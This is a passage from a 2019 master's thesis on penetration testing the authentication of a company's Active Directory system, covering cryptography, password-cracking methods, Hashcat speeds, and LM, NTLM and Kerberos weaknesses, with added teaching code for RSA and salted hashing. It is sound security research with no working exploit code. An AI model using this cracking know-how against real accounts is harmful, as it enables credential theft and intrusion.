
Vulnerability Assessment of Authentication Methods in a Large-Scale Computer System


Academic year: 2022

DEGREE PROJECT IN COMPUTER SCIENCE AND ENGINEERING, SECOND CYCLE, 30 CREDITS
STOCKHOLM, SWEDEN 2019

Vulnerability Assessment of Authentication Methods in a Large-Scale Computer System

DAVIS FREIMANIS

KTH ROYAL INSTITUTE OF TECHNOLOGY
SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

Vulnerability Assessment of Authentication Methods in a Large-Scale Computer System

DAVIS FREIMANIS

Master in Computer Science
Date: July 5, 2019
Supervisor: Pontus Johnson
Examiner: Mathias Ekstedt
School of Electrical Engineering and Computer Science
Swedish title: Sårbarhetsbedömning av autentiseringsmetoder i ett storskaligt datorsystem

Abstract

Vulnerabilities exist in almost all software programs. Some software is more vulnerable than others. A method that can be used to mitigate the vulnerabilities is penetration testing. In this thesis, a penetration test was conducted on a large-scale computer system provided by a company. The goal of the thesis was to see if vulnerabilities could be found, with a focus on the field of authentication. After conducting a thorough penetration test, vulnerabilities were found that threaten the confidentiality and integrity of the system.

Authentication vulnerabilities were found by leaking password hashes and by performing pass-the-hash and pass-the-ticket exploits.


Summary (Swedish abstract)

Vulnerabilities exist in almost all software programs. Some are more serious than others. One method that can be used to reduce the risk that a system is exposed to hacker attacks is to perform so-called penetration tests. This thesis presents a way to perform penetration tests, as well as the results of a penetration test that was carried out at a company. The goal was to find out whether there are vulnerabilities in the system, first and foremost in authentication. A couple of vulnerabilities that threaten the confidentiality and integrity of the system were found. Weaknesses in authentication were found by leaking password hashes and by performing pass-the-hash and pass-the-ticket exploits.


Contents

1 Introduction 1

1.1 Problem Statement . . . 2

1.1.1 Research Question . . . 2

1.1.2 Hypothesis . . . 3

1.2 Goal of the Thesis . . . 3

1.3 Scope . . . 3

1.4 Outline . . . 3

2 Theory 5

2.1 Information Security . . . 5

2.1.1 Confidentiality . . . 6

2.1.2 Integrity . . . 6

2.1.3 Availability . . . 6

2.1.4 Authenticity . . . 6

2.1.5 Accountability . . . 6

2.2 Cryptography . . . 7

2.2.1 Symmetric Cryptography . . . 7

2.2.2 Public-Key Cryptography . . . 8

2.2.3 Hash Functions . . . 9

2.2.4 Message Authentication Code . . . 10

2.3 Password Cracking . . . 10

2.3.1 Brute-force . . . 11

2.3.2 Dictionary Attacks . . . 11

2.3.3 Rainbow Tables . . . 11

2.3.4 Hybrid Attacks . . . 11

2.3.5 Password Cracking Defences . . . 12

2.4 Vulnerability Disclosure . . . 13

2.4.1 Responsible Disclosure . . . 13

2.4.2 Full Disclosure . . . 13


3 Windows Authentication 14

3.1 Active Directory . . . 14

3.2 Windows Authentication . . . 15

3.2.1 Challenge-Response . . . 15

3.2.2 Kerberos . . . 18

4 Penetration Testing 21

4.1 Pre-Engagement Interactions . . . 22

4.2 Intelligence Gathering . . . 22

4.3 Threat Modeling . . . 22

4.4 Vulnerability Analysis . . . 24

4.5 Exploitation . . . 24

4.6 Post Exploitation . . . 24

4.7 Reporting . . . 25

5 Methods 26

5.1 Target System . . . 26

5.1.1 Hacking Machine . . . 27

5.1.2 Tools . . . 27

5.2 Threat Modeling Phase . . . 30

5.2.1 Intelligence Gathering . . . 30

5.2.2 Building the Model . . . 31

5.2.3 Validating the Model . . . 31

5.2.4 Threat Enumeration . . . 32

5.3 Exploitation Phase . . . 32

5.3.1 LLMNR Poisoning . . . 33

5.3.2 SMB Relay . . . 34

5.3.3 Kerberos Pass the Ticket . . . 34

5.4 Reporting . . . 35

6 Threat Modeling Results 36

7 Exploitation Results 38

7.1 Domain Administrator . . . 38

7.2 LLMNR Poisoning . . . 39

7.3 SMB Relay . . . 40

7.4 Kerberos . . . 41

8 Discussion 43

8.1 Summary of the Findings . . . 43

8.2 Mitigations of the Attacks . . . 44

8.3 Methodology . . . 46

8.4 Ethical Considerations . . . 47

8.5 Future Work . . . 48

9 Conclusion 49

References 50

Glossary

ACL Access Control Lists. 6, 23

AD Active Directory. 14, 20, 26, 28, 32, 34, 41, 45

APT Advanced Persistent Threats. 47

AS Authentication Service. 19, 20

CIA Confidentiality, Integrity and Availability. 5, 7

CVE Common Vulnerabilities and Exposures. 1

DC Domain Controller. 14, 20, 26

DES Data Encryption Standard. 16–18

DNS Domain Name System. 33

DoS Denial of Service. 6

GPO Group Policy Object. 14

IDS Intrusion Detection System. 46, 48

IP Internet Protocol. 22

KDC Key Distribution Center. 18, 20

LLMNR Link-Local Multicast Name Resolution. 29, 33, 34, 38, 39, 43, 45

LM LAN Manager. 16, 17

LSASS Local Security Authority Subsystem Service. 29

MAC Message Authentication Code. 10

MD Message Digest. 17

MITM Man-In-The-Middle. 18, 34

NIST National Institute of Standards and Technology. 5

NT New Technology. 17

NTLM New Technology LAN Manager. 11, 12, 16–18, 20, 33, 39, 41

NTP Network Time Protocol. 24

OU Organizational Unit. 14, 15

SMB Server Message Block. 29, 34, 38, 40, 41, 43, 45, 46

SQL Structured Query Language. 24

SSO Single Sign-On. 18, 34

TGS Ticket Granting Service. 20

TGT Ticket Granting Ticket. 19, 20, 34, 35

XSS Cross-Site Scripting. 24

List of Figures

2.1 Symmetric cryptography . . . 8

2.2 Public-key cryptography . . . 9

3.1 Challenge-response authentication . . . 15

3.2 NTLMv1 challenge-response protocol . . . 17

3.3 NTLMv2 challenge-response protocol . . . 18

3.4 Kerberos authentication process . . . 19

5.1 Target system infrastructure . . . 27

5.2 Bloodhound output . . . 28

5.3 Threat model of the system modeled in Threat Modeling Tool . . . 31

5.4 A playing card from the Elevation of Privilege game [39] . . . 32

5.5 LLMNR poisoning . . . 33

5.6 SMB relay attack . . . 35

7.1 Output from LLMNR poisoning using Responder . . . 39

7.2 Output from RunFinger.py . . . 40

8.1 Tier model logon restrictions [53] . . . 44


Chapter 1 Introduction

We live in a highly connected world, and every day new devices are being connected and controlled over the public internet. It is important to secure these systems to prevent malicious attackers from gaining access to the services that we depend on every day.

The Common Vulnerabilities and Exposures (CVE) list is a database of publicly disclosed vulnerabilities and exposures [1]. The number of vulnerabilities grows every year, and in 2018 the database passed 100 000 entries [2, 3]. Vulnerabilities in large-scale systems are not uncommon, as we read about big data breaches like Equifax¹ [4] or large nation-sponsored attacks like the notorious Stuxnet worm² that infected Iran's nuclear facility and made centrifuges spin out of control until failure [5]. In Windows alone, plenty of vulnerabilities are discovered and disclosed by security researchers.

Microsoft Patch Tuesday is a day every month on which Microsoft releases patches for vulnerabilities [6]. These patches only fix vulnerabilities known to Microsoft. There still exist discovered vulnerabilities that are not reported but stashed away or sold on the black market. No one knows how many exist, and no one knows when they will be exploited [7].

In a report that McAfee published together with the Center for Strategic and International Studies (CSIS), it is estimated that cybercrime cost $500 billion in 2014 and that it would cost over $600 billion in 2018 [8]. This is equal to 0.8% of the global GDP. For this reason, there exists a market for exploits and vulnerabilities. These vulnerabilities can be used for espionage or cyber warfare, and governments are stockpiling them. There has been discussion around stockpiling, as leaks of these vulnerabilities could lead to more harm than good. Research shows that vulnerabilities have an average life expectancy of 6.9 years [9].

¹ Vulnerability in Apache Struts CVE-2017-5638

² LNK vulnerability CVE-2010-2568 and others

Penetration testing is a way to find and mitigate vulnerabilities, or at least to delay an attacker's access to a system, by assessing the security before an attack has happened. This kind of security assessment is also called ethical hacking and is commonly conducted by external security experts. Paying security experts to find vulnerabilities in a system before they have been exploited is usually more cost effective in the long run. This is also why big companies like Google have their own bug bounty programs, where anyone can get access to test systems and get paid when a vulnerability is reported [10, 11].

The methodology in this thesis will be similar to the one mentioned above and will be described in detail in Chapters 4 and 5. A real system provided by a company will be analyzed and tested to find as many vulnerabilities as possible.

1.1 Problem Statement

Vulnerabilities in a computer system can damage a company's trust. The damage arises when a system is compromised or data is leaked. One way for an attacker to get inside a network and closer to its target is to abuse the authentication mechanisms.

In this thesis, a penetration test will be conducted on a company’s system to detect and report potential vulnerabilities to authentication.

1.1.1 Research Question

This thesis is done in collaboration with KTH and a company that will remain anonymous throughout this thesis. The research question of this thesis is:

What kind of authentication vulnerabilities can be found in a large-scale computer system, and what actions can be taken to mitigate the attacks?


1.1.2 Hypothesis

The hypothesis is that several vulnerabilities will be found in the system due to the size and complexity of the system.

1.2 Goal of the Thesis

The main goal of this thesis is to conduct a comprehensive penetration test on a large scale computer system for a company. Vulnerabilities will be enumerated and exploited to create a proof of concept attack. The results from the test will give the company good advice to secure their system to protect against malicious actors in the future.

1.3 Scope

The scope of the thesis is to use penetration testing methods to find vulnerabilities in the provided system. Social engineering techniques and physical penetration testing are not used in this thesis. The perimeter security will not be tested, as the attacker will already be inside the network in this scenario.

To narrow the scope of the thesis, the focus area of authentication is chosen after the initial threat modeling of the system. Found vulnerabilities will be disclosed to the company in a responsible manner, as described in Section 2.4.1. Fixing the found vulnerabilities is not part of the thesis and is left to the company.

1.4 Outline

This chapter has introduced the topic and described the problem statement and the goals of this thesis. The rest of the thesis is structured as follows. Chapters 2 and 3 present the theory and background material for this thesis, while Chapters 4 and 5 present the penetration testing methodology as well as the target system, the hacking setup used by the attacker and how the found vulnerabilities work. Chapter 6 presents the initial results from the threat modeling phase, while Chapter 7 presents the results from the exploitation phase where the authentication vulnerabilities are exploited. Chapter 8 discusses the results and Chapter 9 concludes the thesis.


Chapter 2 Theory

This chapter presents a theoretical overview of the main concepts needed to fully understand the thesis. Section 2.1 presents what information security and the CIA-triad are. Section 2.2 presents the fundamentals of cryptography that are used in authentication. Section 2.3 presents password cracking techniques and mitigations. The chapter is wrapped up in Section 2.4, where different vulnerability disclosure methods are presented.

2.1 Information Security

NIST [12] defines "Information Security" as:

The term information security means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide integrity, confidentiality, and availability.

The fundamentals of information security can be summarized with a concept called the CIA-triad (Confidentiality, Integrity, and Availability). The STRIDE model presented in Section 4.3 is closely connected to the CIA-triad and is a way to find and mitigate vulnerabilities that violate these concepts. The CIA-triad and its augmentations (Authenticity and Accountability) are described next.


2.1.1 Confidentiality

Confidentiality is the assurance that information is seen only by authorized users and is equivalent to privacy. An easy way to protect files against unauthorized access is to password-protect and encrypt them such that only users with the correct key can access the files [12].

2.1.2 Integrity

Integrity is the protection of data and systems against tampering. It is important that critical information can be trusted [12]. Threats to integrity can be mitigated with cryptographic signatures or by implementing Access Control Lists (ACL) [13].

2.1.3 Availability

Availability is ensuring reliable access to information. A system should not deny access to authorized users [12]. A common attack against availability is Denial of Service (DoS) attacks.

2.1.4 Authenticity

Authenticity is a property important for trust and verifiability. It is important that users can be verified and that a user can validate that a message comes from the correct origin [13].

2.1.5 Accountability

Accountability means that actions can be traced to events. In case of a data breach, logs must be kept for later forensics, which could help in legal actions. Accountability also helps with non-repudiation [13].


2.2 Cryptography

Cryptography is an important component in any authentication scheme. Confidentiality and integrity from the CIA-triad are both achieved with correct usage of mathematical functions. This section is based on Douglas R. Stinson's book Cryptography: Theory and Practice [14] and presents the core concepts of cryptography that are used in the field of authentication.

In the examples, Alice and Bob represent two persons that want to communicate with each other. Mallory represents a malicious user that wants to eavesdrop on and alter messages.

2.2.1 Symmetric Cryptography

Symmetric cryptography is based on a pre-shared key that Alice and Bob have agreed on in advance. It is called symmetric cryptography because encryption and decryption use the same key. Alice encrypts her message $m$ with the encryption procedure $e_k$ using the pre-shared key $k$. Alice sends the produced ciphertext $c$ over an insecure channel to Bob. Bob can decrypt the message using the same pre-shared key with the decryption procedure $d_k$. Unless Mallory knows the pre-shared key, she is not able to intercept the message and decrypt it [14].

$$c = e_k(m), \qquad m = d_k(c)$$

A remaining problem is how to share the key between the parties. The Diffie-Hellman key exchange scheme was first published in 1976 by Whitfield Diffie and Martin Hellman and can be used to share a secret key over an insecure channel. It is based on the discrete logarithm problem [15]. Symmetric cryptography is shown in Figure 2.1, where Alice sends a message to Bob by encrypting it with the pre-shared key. The message is then sent over an insecure channel. Bob can decrypt the message because he has the key.

Figure 2.1: Symmetric cryptography (Alice and Bob each hold the shared key; the message encrypted with the shared key is sent from Alice to Bob)

2.2.2 Public-Key Cryptography

Public-key cryptography or asymmetric cryptography was first proposed by Diffie and Hellman in 1976 [15] and was a year later implemented by Rivest, Shamir, and Adleman as the RSA algorithm [16].

A public-key scheme uses a key pair consisting of a private key and a public key. The public key is published to the world and the private key is kept by Bob. If Alice wants to send something to Bob, she can encrypt the message with Bob's public key and send it to Bob. Only Bob can decrypt the message because he is the only one with the private key. The RSA algorithm is presented below in five steps [14].

1. Generate two large primes $p$ and $q$ such that $p \neq q$

2. $n \leftarrow pq$ and $\phi(n) \leftarrow (p - 1)(q - 1)$

3. Choose a random $b$ where $1 < b < \phi(n)$ such that $\gcd(b, \phi(n)) = 1$

4. $a \leftarrow b^{-1} \bmod \phi(n)$

5. The public key is $(n, b)$ and the private key is $(p, q, a)$

The keys can be used to encrypt and decrypt messages. To encrypt a message $x$ we use the encryption function $e(x)$:

$$e(x) = x^b \bmod n$$

and to decrypt a message $y$ we use the decryption function $d(y)$:

$$d(y) = y^a \bmod n$$


One attack on RSA is to find the two prime factors of $n$. In that case it is easy to compute $\phi(n)$ and then derive the decryption exponent [14]. The largest RSA number factored so far is 768 bits; the factorization took 2 years and required more than $10^{20}$ operations, or equivalently 2000 years of CPU time on a 2.2 GHz AMD Opteron [17]. The prime numbers in RSA are usually 1024, 2048 or 4096 bits in length, where larger prime numbers result in higher security if generated correctly.
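The five key-generation steps, the functions $e(x)$ and $d(y)$, and the factoring attack just described, worked in Python as an added example (my code, not the thesis author's). The primes 61 and 53 are my choice and are deliberately tiny so that trial division factors $n$ instantly; real keys use the sizes stated above.

```python
"""Textbook RSA following the five key-generation steps of Section 2.2.2.

Added example, not the thesis author's code. The primes are deliberately tiny
so that the factoring attack described in the text can be run instantly.
"""
import math
import random


def generate_keypair(p: int, q: int, rng=None):
    """Steps 1-5: n = pq, phi(n) = (p-1)(q-1), random b coprime to phi(n), a = b^-1 mod phi(n)."""
    assert p != q, "step 1 requires two distinct primes"
    rng = rng or random.Random(1)               # seeded so the example is reproducible
    n, phi = p * q, (p - 1) * (q - 1)
    while True:                                 # step 3: retry until gcd(b, phi) == 1
        b = rng.randrange(2, phi)
        if math.gcd(b, phi) == 1:
            break
    a = pow(b, -1, phi)                         # step 4: modular inverse (Python 3.8+)
    return (n, b), (p, q, a)                    # step 5: public key, private key


def encrypt(public_key, x: int) -> int:
    """e(x) = x^b mod n"""
    n, b = public_key
    assert 0 <= x < n, "plaintext must be an integer smaller than n"
    return pow(x, b, n)


def decrypt(private_key, y: int) -> int:
    """d(y) = y^a mod n, with n recomputed from p and q"""
    p, q, a = private_key
    return pow(y, a, p * q)


def factor_by_trial_division(n: int):
    """The attack from the text: recover p and q. Only feasible for tiny n."""
    for p in range(2, math.isqrt(n) + 1):
        if n % p == 0:
            return p, n // p
    raise ValueError("n has no non-trivial factor")


def recover_private_exponent(public_key) -> int:
    """Once p and q are known, phi(n) and therefore a = b^-1 mod phi(n) follow directly."""
    n, b = public_key
    p, q = factor_by_trial_division(n)
    return pow(b, -1, (p - 1) * (q - 1))


if __name__ == "__main__":
    pub, priv = generate_keypair(61, 53)        # n = 3233, phi(n) = 3120
    c = encrypt(pub, 65)
    print("ciphertext", c, "-> plaintext", decrypt(priv, c))
    print("recovered exponent matches:", recover_private_exponent(pub) == priv[2])
```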

In Figure 2.2, public-key cryptography is shown. Bob's public key is available to anyone, including Alice and Mallory. Both Alice and Mallory can encrypt files with this key, but only Bob can decrypt them with his private key.

Figure 2.2: Public-key cryptography (Bob's public key is known to everyone; the message encrypted with Bob's public key is sent from Alice to Bob, who decrypts it with his private key)

2.2.3 Hash Functions

Cryptographic hash functions, or one-way functions, are used to provide data integrity. Common usages of hash functions are digital signatures, file integrity, and password storage.

A hash function $h : X \to Y$ takes an $x \in X$ and produces a $y \in Y$, making a pair $(x, y)$. A good hash function should have three properties:

• Preimage resistance

• Second preimage resistance

• Collision resistance

Preimage resistance: Given a hash function $h : X \to Y$ and a $y \in Y$, it should be hard to find an $x \in X$ such that $h(x) = y$.

Second preimage resistance: Given a hash function $h : X \to Y$ and an $x \in X$, it should be hard to find $x' \in X$ such that $x' \neq x$ and $h(x') = h(x)$.

Collision resistance: Given a hash function $h : X \to Y$, it should be hard to find $x, x' \in X$ such that $x' \neq x$ and $h(x') = h(x)$.

The properties say that it should be hard to find two different messages that produce the same hash, and it should also be hard to find the message given a hash. Preimage resistance ensures confidentiality: a hashed message or password should not be possible to reverse. Second preimage resistance ensures integrity and is a protection against tampering. If second preimage resistance fails, an attacker could modify files in such a way that the hash stays the same [14].

2.2.4 Message Authentication Code

A Message Authentication Code (MAC) is a technique used for message integrity. The person that receives a message wants to be certain that it comes from the correct source and has not been tampered with. Using a shared key, Alice can generate a MAC based on the shared key and the message. The MAC is sent together with the message, and Bob can verify that Alice was the one that sent the message. Digital signatures work in a similar way but use a public-key infrastructure instead. An HMAC is a hash-based MAC and can use a hashing algorithm like MD5 or SHA1 [13, 14].

2.3 Password Cracking

Password cracking is an important tool in penetration testing. To be able to move laterally, the attacker can find credentials stored on a compromised computer that are reused in multiple locations. Usually, the passwords are hashed with a cryptographic one-way function. This means that to crack a password, the exact password must be hashed with the same function and then compared to the hash. The naive way is to do it by brute force, checking every possible combination. Dictionary attacks target the most common passwords, words, and phrases. Rainbow tables are lists of precomputed hashes that allow for faster cracking. The most common tools for cracking passwords are Hashcat [18] and John the Ripper [19].


2.3.1 Brute-force

A brute-force attack tests every possible combination of a chosen character set. This is also called the keyspace of the password. The number of combinations depends on the length of the password and the keyspace that is used. A standard US keyboard has 95 keys, which means that there exist $95^x$ possible passwords for a password of length $x$. The number of combinations grows exponentially when the length of the password increases. Using additional characters would further increase the keyspace of the password. Brute force is a good technique for cracking short passwords, but for longer ones there exist better and more reliable techniques.

2.3.2 Dictionary Attacks

Dictionaries are lists of commonly used passwords, words from dictionaries and easy key combinations. Rules can be applied to check common permutations and substitutions of characters in words. A dictionary attack is a type of brute-force attack and is effective for cracking commonly used passwords, but it requires computational resources to generate the hashes for every word in the list.

2.3.3 Rainbow Tables

Rainbow tables are precomputed lists of hashes that remove the need to recompute the hash of every possible combination. These lists are usually huge and are a way to trade storage space for cracking time [20]. A precomputed list of NTLM-hashes with all possible password combinations that can be made on a standard 95-key US keyboard, for lengths up to 9, is 690 GB in size [21].

2.3.4 Hybrid Attacks

Password policies commonly require the user to choose a password with an uppercase letter, digit, and symbol. By combining dictionary attacks with brute-force, the attacker can append digits and symbols to the passwords to test different variants of the password with small alterations. This is called a hybrid attack. Substitution rules can also be added to try commonly used substitutions such as changing the letter A with the digit 4.


2.3.5 Password Cracking Defences

To have a secure password, it is important both that the password itself is strong and that it is stored in a secure manner. A stored password should be hashed with a strong hash function to protect it in case the database is compromised. Due to the low entropy of user-chosen passwords, it is not recommended to only hash the password. To further protect stored passwords, a random salt value should be generated for every user and concatenated with the password before feeding it to the hashing algorithm [22].

$$\text{hashed password} = H(\text{salt} \,\|\, \text{password})$$

This prevents an attacker from using dictionary attacks and rainbow tables across users; hashes have to be generated for every user separately. With a salt, it is also impossible to see whether a password is used by multiple users. Neither NTLMv1 nor NTLMv2, commonly used authentication methods in Windows (see Section 3.2), uses this protection mechanism; they are therefore easier to crack, and common passwords are easier to detect.

The choice of the hashing algorithm is also important as the longer it takes to generate a hash, the more resources the hacker requires to crack a password.

Another method to slow down password cracking is to use a key derivation function such as PBKDF, bcrypt or scrypt to increase the hashing time. Hashing the password once takes the user only a fraction of a second, but when an attacker tries to crack the password this time increment is very noticeable. This type of hashing function is recommended practice when storing passwords [23]. A comparison between commonly used hashes is presented in Table 2.1.

The benchmark was done on a machine with 8x Nvidia GTX 1080 cards and Hashcat v.3.00 [18] [24].

Hash type (Hashcat hash-mode [25])    Hashes/second
NT-hash (1000)                        334.0 GH/s
NetNTLMv1 (5500)                      179.3 GH/s
NetNTLMv2 (5600)                      13149.5 MH/s
bcrypt (3200)                         105.7 kH/s
scrypt (8900)                         3493.6 kH/s

Table 2.1: Hashcat benchmarks for common hashes
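The salted, key-derivation-function storage recommended in Section 2.3.5, as an added example (my code, not the thesis author's). It uses PBKDF2-HMAC-SHA256 from the Python standard library; the record format, the iteration count and the sample user passwords are my own choices, and the unsalted variant is included only to show how password reuse becomes visible without a salt.

```python
"""Salted, iterated password storage as recommended in Section 2.3.5.

Added example, not the thesis author's code. It uses PBKDF2-HMAC-SHA256 from
the Python standard library; the record format and iteration count are my own
choices, not anything prescribed by the thesis.
"""
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 200_000          # work factor; raise it as hardware gets faster


def unsalted_hash(password: str) -> str:
    """The pattern the text warns against: one pass of a fast hash, no salt."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def hash_password(password: str, salt: bytes = None, iterations: int = ITERATIONS) -> str:
    """H(salt | password) with a key derivation function; returns "algo$iters$salt$hash"."""
    if salt is None:
        salt = os.urandom(16)                   # fresh random salt for every user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"{ALGORITHM}${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute using the salt and iteration count stored in the record, then compare."""
    try:
        algorithm, iterations, salt_hex, digest_hex = record.split("$")
    except ValueError:
        return False                            # malformed record
    if algorithm != ALGORITHM:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    # constant-time comparison so the check itself does not leak timing information
    return hmac.compare_digest(digest.hex(), digest_hex)


def reuse_visible(stored_values) -> bool:
    """True if two stored values are identical, i.e. an attacker can spot password reuse."""
    stored_values = list(stored_values)
    return len(set(stored_values)) < len(stored_values)


if __name__ == "__main__":
    # Constructed sample: two users who happen to share a password.
    users = {"alice": "Summer2019!", "bob": "Summer2019!"}
    print("unsalted reuse visible:", reuse_visible(unsalted_hash(p) for p in users.values()))
    print("salted reuse visible:  ", reuse_visible(hash_password(p) for p in users.values()))
```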


2.4 Vulnerability Disclosure

Vulnerability disclosure in computer science has multiple variants. When a flaw is found in a program, the finding can be disclosed in a few different ways; the two most popular methods are responsible and full disclosure, which are described next.

2.4.1 Responsible Disclosure

Responsible disclosure is sometimes called coordinated disclosure. When the vulnerability researcher finds a vulnerability, it gets reported to the affected vendor. The vendor is given a grace period, usually ranging from 45 to 182 days [26], to develop a patch for the vulnerability before it is publicly disclosed. Many companies like Google [10] and Microsoft [27] have their own bug bounty programs, where hackers are awarded money if they find and report bugs to the companies.

2.4.2 Full Disclosure

Full disclosure is the second type of vulnerability disclosure [26]. In full disclosure, a vulnerability is published without giving the vendor a forewarning.

This gives very little time for a patch to be released before attackers can exploit the vulnerability. Bruce Schneier has been known as an advocate for full disclosure since he wrote an article in 2007 arguing that full disclosure is a good idea. His main argument was that vendors did not act fast enough, or at all, when researchers found vulnerabilities, but only when vulnerabilities were released to the public. He does, however, believe that responsible disclosure is good, but that it would not work if full disclosure existed [28]. Full disclosure is usually considered the opposite of responsible disclosure.

Chapter 3 Windows Authentication

This chapter presents an overview of Microsoft Active Directory in Section 3.1, and Section 3.2 presents the most common authentication methods in Windows-based environments, namely challenge-response schemes and ticket-based schemes such as Kerberos.

3.1 Active Directory

Active Directory (AD) is a service for Microsoft Windows servers. It is a directory service whose purpose is to centralize domain management. The server in a network that runs AD is called the Domain Controller (DC). Its purpose is to authenticate and authorize users and computers in its AD domain, as well as to enforce security policies [29].

Active Directory was first released with Windows 2000 server edition and has since then evolved to an umbrella term for identity-related services in Windows server. In 2014, it was estimated that over 95% of Forbes 1000 companies use AD in their business [30], making it a target for hackers. This is what makes AD security crucial for both Microsoft and server administrators that configure the servers.

Data in AD is stored in objects. Objects can be user accounts, computers and Organizational Units (OU). Administrators can use Group Policy Objects (GPO) to manage all settings for individual users, computers, groups and Organizational Units. The policies range from screen savers to password policies. A domain administrator can set these policies on any object in Active Directory.


There exist two types of objects: containers and non-containers. As the data is stored in a hierarchical structure, containers can contain other containers or non-containers. Non-containers are leaf nodes in the structure and do not contain other objects. The most common container is an Organizational Unit. Policies can be set for any object and are applied through the hierarchy [29].

3.2 Windows Authentication

In Windows systems, there are two main types of authentication scheme. The first is challenge-response authentication, presented in Figure 3.1. In challenge-response schemes, the client uses the user's password hash to encrypt a challenge from the server. In Windows there exist NTLMv1 and NTLMv2, which are presented next. Kerberos is a ticket-based system. The main advantage of a ticket-based system is that the password or hash of the user is never sent over the network.

Figure 3.1: Challenge-response authentication (the client sends an authentication request, the server returns a challenge, and the client answers with a response)

3.2.1 Challenge-Response

The challenge-response scheme consists of three messages:

1. The client wants to log in to a server. It sends an authentication request to the server.

2. The server generates a random sequence of bytes. This is called the challenge and is sent to the client.

3. Both the client and the server encrypt the challenge with a negotiated scheme using the user's password. This is called the response.


If the response from the client matches the result on the server, then authentication succeeds. Otherwise, authentication fails and the client is denied access to the server. This procedure is presented in Figure 3.1. The benefit of a challenge-response scheme is that it prevents replay attacks, as the challenge is randomly generated every time an authentication request is made.

This scheme also does not directly expose the user's password, but in some cases the password can be recovered, as presented in Section 2.3 [31].

LM Challenge-Response

LAN Manager (LM) authentication is one of the first authentication schemes.

It is fairly simple and depends on a weak hash algorithm for the password called LM-hash. The password in this scheme is limited to only 14 characters and the hashing algorithm can easily be described.

1. The password is converted to uppercase characters

2. The password is padded with null-bytes up to 14 characters

3. The padded password is split into two 7-byte parts that are each used as a key to DES-encrypt the hardcoded ASCII string "KGS!@#$%"

4. The two ciphertexts are concatenated to form the final LM-hash

To respond to the challenge sent by the server, the client adds padding to the LM-hash to create a 21-byte string. This string is split into three 7-byte parts that are each used as a key to DES-encrypt the challenge. The results are concatenated into a 24-byte string that is sent back to the server.

The LM scheme is very weak and should not be used in modern systems. The keyspace is greatly reduced by the fact that the LM-hash is case insensitive, and the password is limited to 14 characters. LM-hashes can be cracked using brute force or rainbow tables to retrieve the cleartext password. Passwords shorter than 8 characters will always have the same second half of the hash, which easily identifies short passwords [31].

NTLMv1

NTLMv1 is very similar to LM challenge-response but is more secure, as it solves the most critical issues. Instead of the LM-hash, NTLMv1 uses a cryptographically stronger hash called the NT-hash. The NT-hash uses MD4 [32] to hash the user's password:

NT-hash = MD4(unicode(password))

The password is converted to little-endian UTF-16 before hashing, and the algorithm produces a 16-byte hash.

The NTLMv1 challenge-response scheme is very similar to the LM scheme presented previously. It is presented in Figure 3.2.

Figure 3.2: NTLMv1 challenge-response protocol (the server sends the server challenge SC; the client derives K1 from bytes 1-7 of the NT-hash, K2 from bytes 8-14 and K3 from bytes 15-16 padded with null bytes, and returns the concatenation of DES(K1, SC), DES(K2, SC) and DES(K3, SC))

1. The server sends an 8-byte randomly generated challenge C

2. The user's password is hashed with MD4 to obtain a 16-byte hash called the NT-hash

3. The hashed password is padded with 5 null-bytes and split into 3 equal parts K1, K2, K3 of 7 bytes each

4. K1, K2 and K3 are each used as a key to encrypt C using DES

5. The response is the concatenation DES(K1, C) | DES(K2, C) | DES(K3, C) and is 24 bytes long

The server checks the response by validating it against its database or a cen- tralized authentication server like Active Directory.

NTLMv1 solves the main problem with LM by allowing more complex passwords: the NT-hash is case sensitive and MD4 does not depend on the password length. NTLMv1 is however cryptographically weak due to the use of DES, which has only a 56-bit key. The three DES operations are independent of each other, and since K3 contains only two bytes of the NT-hash (the remaining five bytes are null padding), that part of the response can be brute-forced over just 2^16 keys, after which the two remaining 7-byte halves can be attacked separately [31]. The NT-hash itself is also vulnerable to brute-force attacks, as shown in Table 2.1.

NTLMv2

NTLMv2 is the second version of the challenge-response protocol. It is improved and harder to crack than NTLMv1. Instead of DES, the client answers with two HMAC-MD5 values, and both the server and the client contribute randomness to the exchange. The NT-hash is first combined with the upper-cased username and the domain name using HMAC-MD5 to form the NTLMv2 key (NTOWFv2). The client then generates its own challenge CC and a blob containing a timestamp, CC and the target (domain) information received from the server, and sends two responses: LMv2 = HMAC-MD5(key, SC | CC) followed by CC, and NTv2 = HMAC-MD5(key, SC | blob) followed by the blob. Because the key depends on the user and domain names and the response covers a client-chosen challenge and timestamp, precomputed tables are useless and a captured response can only be attacked by guessing the password offline. Figure 3.3 presents the NTLMv2 challenge-response protocol.

Figure 3.3: NTLMv2 challenge-response protocol. Inputs: NT-hash, username, domain name, server challenge SC, client challenge CC and the blob CC* (domain name, second client challenge, time, format). The client returns Response 1 = LMv2 + CC and Response 2 = NTv2 + CC*.

3.2.2 Kerberos

Kerberos [33] is a cryptographic authentication protocol developed at MIT.

The protocol is based on secret-key cryptography and replaces password-based authentication between clients and servers. Since the password itself is never transmitted, an attacker eavesdropping on the network as a Man-In-The-Middle (MITM) cannot sniff cleartext passwords.

Kerberos uses tickets instead of passwords and is widely used as a Single Sign-On (SSO) service. The Kerberos architecture consists of a client, a service that the client wants to authenticate to and a Key Distribution Center (KDC).

The architecture is presented in Figure 3.4 along with all ticket requests and responses that are described next [33].

Figure 3.4: Kerberos authentication process. The client (holding the user's password and, after the exchange, the TGS session key and the service session key), the KDC (the Authentication Server with the user database, and the Ticket Granting Service with the TGS secret key and the service secret key) and the service (holding its service secret key and later the service session key) exchange six messages: 1 AS-REQ (user ID), 2 AS-REP (TGT), 3 TGS-REQ (TGT + authenticator), 4 TGS-REP (TGS ticket), 5 AP-REQ (TGS ticket + authenticator), 6 AP-REP (authenticator).

Step 1. The Kerberos client wants to authenticate to a service. To do so, the client has to request a Ticket Granting Ticket (TGT) from the Authentication Service (AS). The client sends a request, AS-REQ to the AS containing the client’s ID.

